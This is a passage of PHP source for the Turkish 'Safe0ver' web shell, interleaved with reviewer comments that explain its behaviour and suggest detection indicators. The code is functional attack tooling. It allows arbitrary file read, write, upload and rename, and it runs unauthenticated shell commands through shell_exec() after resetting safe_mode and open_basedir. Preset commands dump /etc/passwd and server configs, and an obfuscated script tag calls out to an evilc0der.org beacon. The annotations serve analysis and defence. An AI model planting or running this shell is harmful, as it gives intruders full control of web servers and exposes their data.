  652. elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
  653. echo "<center><table><tr><td NOWRAP>";
  654. $i = 1;
  655. while (file_exists("$lastdir/newfile$i.txt"))
  656. $i++;
  657. $file = fopen("$lastdir/newfile$i.txt", "w+");
  658. if ($file == false)
  659. echo "Could not create the new file...<br>";
  660. else
  661. echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
  662. echo "
  663. <form action=\"$SFileName?$urlAdd\" method=\"POST\">
  664. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  665. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  666. <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
  667. </form></center>
  668. </td></tr></table></center> ";
  669. }
  670. elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
  671. echo "<center><table><tr><td NOWRAP>" ;
  672. $i = 1;
  673. while (is_dir("$lastdir/newdir$i"))
  674. $i++;
  675. $file = mkdir("$lastdir/newdir$i", 0777);
  676. if ($file == false)
  677. echo "Could not create the new directory...<br>";
  678. else
  679. echo "Successfully created: \"$lastdir/newdir$i\"<br>";
  680. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
  681. <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
  682. <input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
  683. <input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\">
  684. </form></center></td></tr></table></center>";
  685. }
  686. elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
  687. $contents = "";
  688. $fc = @file( $file );
  689. while ( @list( $ln, $line ) = each( $fc ) ) {
  690. $contents .= htmlentities( $line ) ;
  691. }
  692. echo "<br><center><table><tr><td NOWRAP>";
  693. echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  694. echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
  695. echo "<strong>EDIT FILE: </strong>$file<br>\n";
  696. echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
  697. echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
  698. echo "<input type=\"submit\" value=\"Save\">";
  699. echo "</form>";
  700. echo "</td></tr></table></center>";
  701. }
elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
    /* Arbitrary file write: both the target path ($file) and the data
       ($contents) are request-controlled globals (see walkArray). Mode "w"
       creates the file or truncates an existing one. None of the three return
       values is checked and nothing is echoed, so the response does not show
       whether the write succeeded.
       Defensive relevance: unexpected modification times or new files under
       the web root that line up with POST requests carrying cmd=saveedit. */
    $fo = fopen($file, "w");
    $wrret = fwrite($fo, stripslashes($contents));
    $clret = fclose($fo);
}
elseif ( $cmd=="downl" ) { /* Send the file named in $file to the client as an attachment */
    /* Arbitrary file read: $file is a request-controlled global (see
       walkArray) and no check restricts it to a directory, so any file the PHP
       process can read can be returned. The HTML page header is skipped for
       this command (the earlier `$cmd != "downl"` test), so the response body
       is the raw file. */
    $downloadfile = urldecode($file);
    /* Suggested download name: the last path component, or a fixed fallback. */
    if (function_exists("basename"))
        $downloadto = basename ($downloadfile);
    else
        $downloadto = "download.ext";
    if (!file_exists("$downloadfile"))
        echo "The file does not exist";
    else {
        /* filesize() failure (false) and an empty file (0) both skip the size suffix. */
        $size = @filesize("$downloadfile");
        if ($size != false) {
            $add="; size=$size";
        }
        else {
            $add="";
        }
        /* Response headers are fixed apart from the name and size, which makes
           "Content-Type: application/download" with an attachment disposition
           a usable pattern when reviewing outbound responses. */
        header("Content-Type: application/download");
        header("Content-Disposition: attachment; filename=$downloadto$add");
        /* The fopen() result is not checked before fpassthru(). */
        $fp=fopen("$downloadfile" ,"rb");
        fpassthru($fp);
        flush();
    }
}
  730. elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
  731. ?>
  732. <center>
  733. <table>
  734. <tr>
  735. <td NOWRAP>
  736. Dosya Y�kleme Sekmesine Tikladiniz !
  737. <br> Eger Y�klemek istediginiz Dosya mevcut ise �zerine Yazilir.<br><br>
  738. <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
  739. <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
  740. <input type="hidden" name="cmd" value="uploadproc">
  741. <input type="hidden" name="dir" value="<?php echo $dir ?>">
  742. <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
  743. <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
  744. Dosya Y�kle:<br>
  745. <input size="75" name="userfile" type="file"><br>
  746. <input type="submit" value="Y�kle">
  747. </form>
  748. <br>
  749. <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
  750. <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
  751. <input type="hidden" name="dir" value="<?php echo $lastdir ?>">
  752. <input tabindex="0" type="submit" value="Iptal">
  753. </form>
  754. </td>
  755. </tr>
  756. </table>
  757. </center>
  758.  
  759. <?php
  760. }
elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
    /* Copies the file at $userfile to "$dir/$userfile_name". All of these are
       plain globals: the branch never consults $_FILES and performs no
       is_uploaded_file()/move_uploaded_file() check, and no restriction is
       placed on the destination name or extension, so an executable script can
       be written anywhere the PHP process may write.
       Defensive relevance: new files appearing in web-served directories
       shortly after multipart POST requests carrying cmd=uploadproc. */
    echo "<center><table><tr><td NOWRAP>";
    /* Only the copy() is conditional; the "Uploaded ..." line below is always
       printed, and $res stays undefined when $userfile does not exist. */
    if (file_exists($userfile))
        $res = copy($userfile, "$dir/$userfile_name");
    echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
    if ($res) {
        echo "Basariyla Y�klendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
        echo "Y�klenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
        echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
    }
    else {
        echo "Y�klenemedi...";
    }
    /* "Back" form: returns to the previous command and directory. The values
       are written into the HTML attributes without escaping. */
    echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
    echo "<br><br></td></tr></table></center>";
}
  777. elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
  778. echo "<hr>";
  779. $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
  780. echo spacetonbsp(@htmlentities($line))."<br>\n";
  781. }
  782. echo "<hr>";
  783. }
  784. elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
       /* Two-step rename handler.
          Step 1 ($newfile empty): splits $oldfile at its last "/" into a
          directory part ($olddir) and a base name ($inputfile) and renders a
          form that posts back cmd=ren with the new name.
          Step 2 ($newfile non-empty): calls rename($oldfile, "$olddir$newfile")
          and prints a success or failure message.
          None of $oldfile, $olddir, $newfile, $lastcmd or $lastdir is validated
          or HTML-escaped in this branch; they are presumably request-supplied
          (confirm against the full file). The rename target is therefore
          unrestricted within the web-server account's permissions, and the
          values are reflected verbatim into the page markup.
          Triage note: unexplained renames inside the document root, including
          files gaining or losing an executable extension, are worth
          correlating with requests to this script in the access log. */
  785. if (function_exists('is_dir')) {
  786. if (is_dir("$oldfile")) {
  787. $objname = "Directory";
  788. $objident = "Directory";
  789. }
  790. else {
  791. $objname = "Filename";
  792. $objident = "file";
  793. }
  794. }
       /* $objname and $objident are only assigned when is_dir() exists; the
          messages below interpolate them either way. */
  795. echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
  796. If (empty($newfile) != true) {
       /* Step 2: a new name was submitted, so perform the rename. The @
          suppresses the warning rename() would otherwise raise on failure. */
  797. echo "<center>";
  798. $return = @rename($oldfile, "$olddir$newfile");
  799. if ($return) {
  800. echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
  801. }
  802. else {
       /* On failure, distinguish "target already exists" from any other
          cause (the second message says "copy" although the operation is a
          rename). */
  803. if ( @file_exists("$olddir$newfile") ) {
  804. echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
  805. }
  806. else {
  807. echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
  808. }
  809. }
  810. echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D�n\"></form></center>" ;
  811. }
  812. else {
       /* Step 1: no new name yet, so derive the directory and base name and
          show the form. strrpos() returns false when $oldfile has no "/", and
          strval(false) is the empty string, so the strval(...) != "" tests
          below are found/not-found checks that still accept position 0. */
  813. $dpos = strrpos($oldfile, "/");
  814. if (strval($dpos)!="") {
  815. $olddir = substr($oldfile, 0, $dpos+1);
  816. }
  817. else {
  818. $olddir = "$lastdir/";
  819. }
       /* Same strrpos() lookup as $dpos above, repeated for the base name. */
  820. $fpos = strrpos($oldfile, "/");
  821. if (strval($fpos)!="") {
  822. $inputfile = substr($oldfile, $fpos+1);
  823. }
  824. else {
  825. $inputfile = "";
  826. }
  827. echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
  828. echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
  829. echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
  830. echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
  831. echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
  832. echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
  833. echo "Rename \"$oldfile\" to:<br>\n";
  834. echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
  835. echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
  836. echo "</td></tr></table></center>";
  837. }
  838. }
  839. else if ( $cmd == "con") {
       /* Placeholder branch: for cmd=con the script only emits the empty
          one-cell table below; no server-side action is taken here. */
  840.  
  841. ?>
  842. <center>
  843. <table>
  844. <tr><td>&nbsp;</td>
  845. </tr></table>
  846. <?php
  847. }
  848. else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
       /* Default branch (no recognised cmd): sets $isMainMenu and renders the
          landing page, which has a title bar, a link into the file browser
          (cmd=dir), a free-text command box and a drop-down of preset
          host-reconnaissance commands. Both forms POST a field named "dizin",
          which the PHP block further down executes. The text box re-displays
          $_POST['dizin'] without HTML-escaping. */
  849. $isMainMenu = true;
  850. ?>
  851. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  852. <tr>
  853. <td width="100%" class="border">
  854. <center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
  855. </td>
  856. </tr>
  857. </table>
  858. <br>
  859. <center>
  860. <table border="0" NOWRAP>
  861. <tr>
  862. <td valign="top" class="silver border">
  863. <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
  864. <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass �zelligi Eklenmis Ve B�ylece Tahrip G�c� Y�kseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya S�m�ren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullan�m:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
  865. </span></td>
  866. </tr>
  867. </table>
  868. <br><p><br>Safe Mode ByPAss<p><form method="POST">
  869. <p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
  870. <input type="submit" value="�alistir"></p>
  871. </form>
  872. <form method="POST">
  873. <p align="center"><select size="1" name="dizin">
  874. <option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
  875. <option value="cat /etc/passwd">cat /etc/passwd</option>
  876. <option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
  877. <option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
  878. <option value="cat /etc/hosts">cat /etc/hosts</option>
  879. <option value="cat /etc/named.conf">cat /etc/named.conf</option>
  880. <option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
  881. <option value="netstat -an | grep -i listen">A�ik Portlar</option>
  882. <option value="ps -aux">�alisan Uygulamalar</option>
  883. </select> <input type="submit" value="�alistir"></p>
  884. </form>
  885. ------------------------------------------------------------------------------------<p>
  886. <?
       /* Command-execution core of the shell. The raw POST field "dizin" is
          passed to shell_exec() with no authentication, allow-list or escaping
          in this block, and the output is echoed into a <textarea> without
          HTML-escaping. The two ini_restore() calls first reset safe_mode and
          open_basedir to their configured (php.ini) values.
          Defensive notes: list shell_exec and the other process-execution
          functions in disable_functions wherever the application does not need
          them; keep upload and other web-writable directories non-executable;
          alert on POST bodies that carry a "dizin" field and on PHP files that
          pair ini_restore() with shell_exec(). */
  887. $evilc0der=$_POST['dizin'];
  888. if($_POST['dizin'])
  889. {
  890. ini_restore("safe_mode");
  891. ini_restore("open_basedir");
  892. $safemodgec = shell_exec($evilc0der);
  893. echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
  894. }
       /* NOTE(review): the inline script that follows this PHP block
          URL-decodes to a SCRIPT SRC include of
          hxxp://www.evilc0der[.]org/logz/yaz.js. Every browser that renders
          this menu therefore contacts that host, which presumably discloses
          where the shell is installed (for example through the Referer
          header). Treat the domain as a network indicator and search proxy
          and DNS logs for it. */
  895. ?>
  896. <Script Language='Javascript'>
  897. <!-- HTML Encryption provided by iWEBTOOL.com -->
  898. <!--
  899. document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
  900. //-->
  901. </Script>
  902. </center>
  903. <br>
  904. <?php
  905. }
  906.  
  907. if ($cmd != "downl") {
       /* Page footer, emitted for every command except "downl" (presumably so
          that a file download is not mixed with HTML; confirm against the
          download branch). The navigation bar appears only when the main menu
          was not rendered; the identification line always follows.
          Triage note: the banner text printed from $scriptident ("Safe0ver By
          Evilc0der.org", set near the top of the script) is a stable content
          signature for finding copies of this file on disk or in cached
          responses. */
  908. if ( $isMainMenu != true) {
  909. ?>
  910.  
  911. <table width="100%" border="0" cellpadding="0" cellspacing="0">
  912. <tr>
  913. <td width="100%" style="class="silver border">
  914. <center><strong>
  915. &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
  916. &nbsp;&nbsp;&nbsp;&nbsp;
  917. &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
  918. </strong></center>
  919. </td>
  920. </tr>
  921. </table>
  922. <br>
  923. <?php
  924. }
       /* Identification line: prints $scriptident, $scriptver and $scriptdate,
          then closes the table opened by the page layout earlier in the file. */
  925. ?>
  926. <table width=100% border="0" cellpadding="0" cellspacing="0">
  927. <tr>
  928. <td width="100%" class="silver border">
  929. <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
  930. </td>
  931. </tr>
  932. </table>
  933. </td>
  934. </tr>
  935. </table>
  936.  
  937. <?php
  938. }
  939.  
  940. ?>